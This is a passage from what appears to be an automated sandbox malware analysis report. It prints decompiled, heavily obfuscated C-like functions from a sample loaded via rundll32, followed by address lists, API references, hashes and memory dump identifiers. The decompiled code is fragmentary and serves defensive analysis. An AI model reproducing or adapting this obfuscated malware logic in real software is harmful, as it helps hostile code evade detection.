				_v52 = _v52 ^ 0x00001a55;
				_v88 = 0xb83d;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x00006413;
				_v20 = 0x5af3;
				_t361 = 0x3a;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 + 0x6d49;
				_v20 = _v20 ^ 0x8eb5ed48;
				_v20 = _v20 ^ 0x8e93dded;
				_v16 = 0x70c;
				_v16 = _v16 / _t361;
				_v16 = _v16 + 0xffff5089;
				_v16 = _v16 | 0x770f0b4d;
				_v16 = _v16 ^ 0xffff12de;
				_v60 = 0xa79c;
				_v60 = _v60 | 0xbac1c5ec;
				_v60 = _v60 + 0x6b12;
				_v60 = _v60 ^ 0xbac228f9;
				_v12 = 0x5546;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x001372eb;
				_v80 = 0x25db;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 3;
				_v80 = _v80 ^ 0x25db4552;
				_v44 = 0xe1b0;
				_v44 = _v44 + 0xffff2f0e;
				_v44 = _v44 | 0x46f5308b;
				_v44 = _v44 * 0x56;
				_v44 = _v44 ^ 0xd65e5bab;
				_v108 = 0x5856;
				_v108 = _v108 ^ 0x78cd5bef;
				_v108 = _v108 ^ 0x78cd26cd;
				_v76 = 0xfba5;
				_v76 = _v76 + 0xffff77ce;
				_t362 = 0x11;
				_v76 = _v76 / _t362;
				_v76 = _v76 ^ 0x00005641;
				_t314 = 2;
				do {
					while(_t315 != 0x1de3f48) {
						if(_t315 == 0x1f19b69e) {
							_t363 = E002078A5(_t315, _t315, 0x10, _t315, 4);
							E00207787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
							_t350 = _t348 + _t314;
							E00207787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
							_t365 = _t365 + 0x40;
							_t351 = _t350 + _t363 * 2;
							_t315 = 0x344e60d4;
							_t303 = 0x5c;
							 *_t351 = _t303;
							_t348 = _t351 + _t314;
							continue;
						} else {
							if(_t315 == 0x344e60d4) {
								_t364 = E002078A5(_t315, _t315, 0x10, _t315, 4);
								E00207787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
								_t365 = _t365 + 0x28;
								_t352 = _t348 + _t364 * 2;
								_t315 = 0x1de3f48;
								_t311 = 0x2e;
								 *_t352 = _t311;
								_t348 = _t352 + _t314;
								continue;
							} else {
								if(_t315 == 0x3a31b660) {
									_t311 = E00218C8F(_t315);
									_v112 = _t311;
									_t315 = 0x1f19b69e;
									continue;
								}
							}
						}
						goto L9;
					}
					E00207787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
					_t349 = _t348 + 6;
					_t365 = _t365 + 0x18;
					_t315 = 0x2228f3b5;
					 *_t349 = 0;
					_t348 = _t349 + _t314;
					L9:
				} while (_t315 != 0x2228f3b5);
				return _t311;
			}

0x00211be8
0x00211bf0
0x00211bf7
0x00211bfd
0x00211c04
0x00211c09
0x00211c10
0x00211c17
0x00211c23
0x00211c28
0x00211c2d
0x00211c34
0x00211c3e
0x00211c43
0x00211c48
0x00211c4f
0x00211c52
0x00211c59
0x00211c60
0x00211c67
0x00211c71
0x00211c76
0x00211c7b
0x00211c82
0x00211c89
0x00211c8d
0x00211c90
0x00211c97
0x00211c9e
0x00211ca5
0x00211cac
0x00211cb6
0x00211cbb
0x00211cc0
0x00211cc7
0x00211cce
0x00211cd5
0x00211cd9
0x00211cdd
0x00211ce4
0x00211cef
0x00211cf0
0x00211cf3
0x00211cfa
0x00211d01
0x00211d08
0x00211d0c
0x00211d13
0x00211d17
0x00211d1e
0x00211d25
0x00211d29
0x00211d30
0x00211d37
0x00211d3e
0x00211d4a
0x00211d4d
0x00211d54
0x00211d63
0x00211d66
0x00211d69
0x00211d70
0x00211d7e
0x00211d81
0x00211d88
0x00211d8f
0x00211d96
0x00211d9a
0x00211da1
0x00211da8
0x00211db3
0x00211db6
0x00211db9
0x00211dc4
0x00211dc7
0x00211dce
0x00211dd9
0x00211ddc
0x00211de6
0x00211de9
0x00211df0
0x00211df7
0x00211dfb
0x00211e02
0x00211e0d
0x00211e0e
0x00211e11
0x00211e18
0x00211e1f
0x00211e26
0x00211e32
0x00211e35
0x00211e3c
0x00211e43
0x00211e4a
0x00211e51
0x00211e58
0x00211e5f
0x00211e66
0x00211e6d
0x00211e71
0x00211e79
0x00211e7c
0x00211e83
0x00211e8a
0x00211e8e
0x00211e92
0x00211e99
0x00211ea0
0x00211ea7
0x00211eb2
0x00211eb5
0x00211ebc
0x00211ec3
0x00211eca
0x00211ed1
0x00211ed8
0x00211ee6
0x00211eeb
0x00211eee
0x00211ef5
0x00211ef6
0x00211ef6
0x00211f08
0x00211f99
0x00211fac
0x00211fb1
0x00211fc8
0x00211fcd
0x00211fd0
0x00211fd3
0x00211fda
0x00211fdb
0x00211fde
0x00000000
0x00211f0a
0x00211f10
0x00211f4e
0x00211f61
0x00211f66
0x00211f69
0x00211f6c
0x00211f73
0x00211f74
0x00211f77
0x00000000
0x00211f12
0x00211f18
0x00211f24
0x00211f29
0x00211f2c
0x00000000
0x00211f2c
0x00211f18
0x00211f10
0x00000000
0x00211f08
0x00211ffb
0x00212000
0x00212005
0x00212008
0x0021200d
0x00212010
0x00212012
0x00212012
0x00212024

Strings

5}X, xrefs: 00211CFA

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5}X
API String ID: 0-583016468
Opcode ID: 7626469b8a08c8b69561ff1d3b1b974840b499d6d164460cb85c9b17d81906f1
Instruction ID: cf1d986aeec8e744da78c437c1ad27128fe92206a67a47e18eb97069724f8ff6
Opcode Fuzzy Hash: 7626469b8a08c8b69561ff1d3b1b974840b499d6d164460cb85c9b17d81906f1
Instruction Fuzzy Hash: 82D12371D10319EBDB18CFE5C88A9DEBBB1FF44314F208019E112BA2A0D7B91A56CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10030661, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

EnumSystemLocalesW.KERNEL32(100305BA,00000001,00000000,?,?,10030E40,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 10030698

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: d0c9966cb22df009f5f607db5fdbfa2366729cb63a81fb46d2479efa7d3497d0
Instruction ID: 75c8e04959bfd1de12414a6d5649df0b888cb2298ff74be165975b541e210f6b
Opcode Fuzzy Hash: d0c9966cb22df009f5f607db5fdbfa2366729cb63a81fb46d2479efa7d3497d0
Instruction Fuzzy Hash: 6EF0E53A3002465BC705DF35D965A6ABF95EFC2755F474058FA098F251C631A842C790

Uniqueness

Uniqueness Score: -1.00%

Function 1002A1D1, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,10026049,?,20001004,00000000,00000002,?,?,100253CC), ref: 1002A205

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 701f0a317aeef71a8c9f3b7b9296c8e4ed26abd9ca1a8bff134870994d04e493
Instruction ID: eec2de0a712a773ad23ce722c3be0754cbc9a2b5819a2b132ce2dd4824922064
Opcode Fuzzy Hash: 701f0a317aeef71a8c9f3b7b9296c8e4ed26abd9ca1a8bff134870994d04e493
Instruction Fuzzy Hash: BAE04F35500228BBCF12AF60EC04E9E3E59EF45760F808011FD05A5161DF769D70AAD5

Uniqueness

Uniqueness Score: -1.00%

Function 100298AA, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00029706,00000001), ref: 100298C4

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: e3f9c103c3eefe4395d8f4b6bc16ca40b006fd7550102b4d811953393c31d4aa
Instruction ID: 4bad7877b7d843de4d4cf665f4bad4e32da55ff9421d368f436bce9860f93924
Opcode Fuzzy Hash: e3f9c103c3eefe4395d8f4b6bc16ca40b006fd7550102b4d811953393c31d4aa
Instruction Fuzzy Hash: 72D0A7340183646BE700AF21EE859403B55F345390F400055F60987261DB717840CA0C

Uniqueness

Uniqueness Score: -1.00%

Function 10029878, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00029706,00000001), ref: 1002988E

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 9118635e29f5271259e7170434c17ae1bcf801cf3e4b57a8e069e56b4c7a3bd5
Instruction ID: f26d2e9e02781e66d0fb332bbbf4359ff076eba19d60e265aec88ddf1e90cc1c
Opcode Fuzzy Hash: 9118635e29f5271259e7170434c17ae1bcf801cf3e4b57a8e069e56b4c7a3bd5
Instruction Fuzzy Hash: 08D012745142609FE704EF30DED5A4037A1F70A340F500599F612CB271DB716844CF08

Uniqueness

Uniqueness Score: -1.00%

Function 10004076, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 1000407B

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3ba26cb425574bb1e5e97d6e4e3ce5ee2eeca9ea773a0f7d6151cd06e1ad6a78
Instruction ID: ea619ec60c48b02dbb355e64c897341b9eca961a532aa481cfda1eca41fb20ea
Opcode Fuzzy Hash: 3ba26cb425574bb1e5e97d6e4e3ce5ee2eeca9ea773a0f7d6151cd06e1ad6a78
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1001C71A, Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

0, xrefs: 1001C8B9

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 507dad0522ef42b1d2f140a24a37546d9dbe1884c59a01cb89d2bb9ae2c1b70d
Instruction ID: 0a08575800a55cda95973972f319f7798fcc3e9804478c37fe413ec670ade784
Opcode Fuzzy Hash: 507dad0522ef42b1d2f140a24a37546d9dbe1884c59a01cb89d2bb9ae2c1b70d
Instruction Fuzzy Hash: CF614431A0434D56DB24DA648891FBEB3D5EF46680F50052EE942DF2D1DBB1EDC18B45

Uniqueness

Uniqueness Score: -1.00%

Function 1001CE40, Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

0, xrefs: 1001CFDF

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 6ea6308736513286238a37eff5b9f1c015b15f68ea0ce49f305f5cd82fd925fd
Instruction ID: 0135d71dd575ce17db8aae7193f3e995c8939407a888322b5155aec0d1d0f13a
Opcode Fuzzy Hash: 6ea6308736513286238a37eff5b9f1c015b15f68ea0ce49f305f5cd82fd925fd
Instruction Fuzzy Hash: F9612570A0034D9ADB28EA648891FBEB3D6EF45684F50482EE846EF281D771EDC78305

Uniqueness

Uniqueness Score: -1.00%

Function 1001D0AC, Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

0, xrefs: 1001D23C

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 696b20c141d328ad8a690407bb80dcd5674d115c50daedb4d0793d5fc21adf2a
Instruction ID: ea2cbbbf5da14b52565811d1af94f3e220b0178b60e1325af3c263b062b3877a
Opcode Fuzzy Hash: 696b20c141d328ad8a690407bb80dcd5674d115c50daedb4d0793d5fc21adf2a
Instruction Fuzzy Hash: EA615370A0030A77DB24FA648991BBEB3E6EB55680F60092BF952DF281D771EDC5C341

Uniqueness

Uniqueness Score: -1.00%

Function 1001C4BD, Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

0, xrefs: 1001C64D

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8822ed5a69bc9f560b073828c57d074377286cf6b27712f74b43c64233c324a0
Instruction ID: 9c26b7fa49ce5624b33321d25eda2c81978084165c0639e282e695cec7de8cfe
Opcode Fuzzy Hash: 8822ed5a69bc9f560b073828c57d074377286cf6b27712f74b43c64233c324a0
Instruction Fuzzy Hash: 706157B0A00B4D96DB28DA688891FBEB3D7EB456C4F50061EE942EF281D771FDC58705

Uniqueness

Uniqueness Score: -1.00%

Function 1001C986, Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

0, xrefs: 1001CB16

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e30b73a2721662dc1c1b32a0a00174f4a7528c029f323c85936146e9d8d28da7
Instruction ID: 50efc6ccef4ff16e8a5198d00afc4523914d19950f182cd2f7bc4a288799f58a
Opcode Fuzzy Hash: e30b73a2721662dc1c1b32a0a00174f4a7528c029f323c85936146e9d8d28da7
Instruction Fuzzy Hash: E8615570A0424D56DB29CA688892FBEB3E5EF55788F90051EE883EF281C731EDC5D346

Uniqueness

Uniqueness Score: -1.00%

Function 1001CBE3, Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

0, xrefs: 1001CD73

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 1887e46bcb5731bdd346f882da5234bdb1a4ad87ee718ef48dfaf71d36cd8731
Instruction ID: cd32867d6c00f582bdd08d54497319113fb444356c6b1273444462af154edb57
Opcode Fuzzy Hash: 1887e46bcb5731bdd346f882da5234bdb1a4ad87ee718ef48dfaf71d36cd8731
Instruction Fuzzy Hash: 966177B0B0034D56DB28CA649891FBE73E6EF41680F50442EE84AEF281D631EDC1C786

Uniqueness

Uniqueness Score: -1.00%

Function 1001B9A5, Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

0, xrefs: 1001BB30

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b1321d98323aa79382950fcef2924b1c1a524c0656c6dac36701bd31154be194
Instruction ID: eb97638f322b7df7855bf2040408368bd7c04a1eca715451477394b98db6b170
Opcode Fuzzy Hash: b1321d98323aa79382950fcef2924b1c1a524c0656c6dac36701bd31154be194
Instruction Fuzzy Hash: FD51C170608F8956DB64C92988E27BE7BDAEF01280F90055DE983DF692D7B1EDC58313

Uniqueness

Uniqueness Score: -1.00%

Function 1001C04A, Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

0, xrefs: 1001C1D5

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: daaf62b3e15e0092e176542775df800296618b7020002aa49c03b0b76e78e313
Instruction ID: f6daf213ca5991af786234bd86231d8216c8786c7e01483eb4a6fc36f2e153c1
Opcode Fuzzy Hash: daaf62b3e15e0092e176542775df800296618b7020002aa49c03b0b76e78e313
Instruction Fuzzy Hash: 76514B71A8078DB7DB66C9744891FAE67DADB4B288F10041DE846DF683C631EDC5C252

Uniqueness

Uniqueness Score: -1.00%

Function 1001B773, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 1001B8EF

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 4c4c86d053e9d75c3f283c674c4a7a6306a1d470dc1e4910c65b799170076b8e
Instruction ID: c9aff95095a2204552c7a5bb7a506d2b5eecfbe78a8a08af0a0f37686b75a642
Opcode Fuzzy Hash: 4c4c86d053e9d75c3f283c674c4a7a6306a1d470dc1e4910c65b799170076b8e
Instruction Fuzzy Hash: E7515D70A08E4996DB64C92488D27AE6BDEEF46A84F10041EE983DF2D1DF31EDC5C351

Uniqueness

Uniqueness Score: -1.00%

Function 1001BBE6, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 1001BD62

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ea4760c08424d57875c2a49d89ea8cab0200ca1df5b4e4844df80f2b2cec58f8
Instruction ID: 957fb16e1a9e035e2c43bf81db174fb11b08e55c9dc4e81cee589c2d8ac00aff
Opcode Fuzzy Hash: ea4760c08424d57875c2a49d89ea8cab0200ca1df5b4e4844df80f2b2cec58f8
Instruction Fuzzy Hash: 05515B70A04F8956DB68C92498D27AE67DAEF42284F50451DE842DF291EF31EDC58392

Uniqueness

Uniqueness Score: -1.00%

Function 1001BE18, Relevance: 1.5, Strings: 1, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 1001BF94

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f479c867a09a753eafe8d4dd509f003e350389983cdc74a3e833a4cba08a5241
Instruction ID: 6650cc6bddf794ec34bdc87c12e056235dc4d43f9fb51d2f2d663078f00417b5
Opcode Fuzzy Hash: f479c867a09a753eafe8d4dd509f003e350389983cdc74a3e833a4cba08a5241
Instruction Fuzzy Hash: 2B516B30A00F899ADB64C9648CD1BEE77DADB05784F10442DEA42DF292C772EDCA8751

Uniqueness

Uniqueness Score: -1.00%

Function 1001C28B, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 1001C407

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d2ffc4fab2e7be211bba3664b56f3fc759b861a6e1c0c7d034ba703f6bd1d7c3
Instruction ID: 5c3c4615dca4f5fc81ca41bf50eaf0426aa318d20a4fd06e420ea5436de1b5f3
Opcode Fuzzy Hash: d2ffc4fab2e7be211bba3664b56f3fc759b861a6e1c0c7d034ba703f6bd1d7c3
Instruction Fuzzy Hash: BA518170A0478D97DB64C9A488E1FBE67DADB01284F10851EE893DF681C675EEC4C356

Uniqueness

Uniqueness Score: -1.00%

Function 002062A3, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002062A3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				char _v1128;
				void* _t179;
				void* _t180;
				intOrPtr _t182;
				void* _t190;
				intOrPtr _t206;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;

				_v88 = 0xf2dad;
				_t209 = 0;
				_t190 = 0x374ac1da;
				_v84 = _v84 & 0;
				_v40 = 0xb12b;
				_v40 = _v40 << 0xe;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000058bc;
				_v60 = 0xf727;
				_t210 = 0x4f;
				_v60 = _v60 / _t210;
				_v60 = _v60 ^ 0x00007065;
				_v8 = 0x9eec;
				_v8 = _v8 + 0xd770;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x00000fb6;
				_v44 = 0x7887;
				_v44 = _v44 << 5;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x00001109;
				_v16 = 0xef0c;
				_t211 = 0x7a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0xca26cbdc;
				_v16 = _v16 | 0x7bdc5f23;
				_v16 = _v16 ^ 0xfbfc55fd;
				_v76 = 0xd8b4;
				_v76 = _v76 + 0x9c32;
				_v76 = _v76 ^ 0x00017966;
				_v36 = 0x1b76;
				_v36 = _v36 + 0x8638;
				_v36 = _v36 | 0x465c0394;
				_v36 = _v36 ^ 0x465cdef1;
				_v28 = 0xf8c7;
				_v28 = _v28 ^ 0x90f840f6;
				_v28 = _v28 / _t211;
				_v28 = _v28 ^ 0x01300a73;
				_v80 = 0x4878;
				_v80 = _v80 ^ 0xf33f81bb;
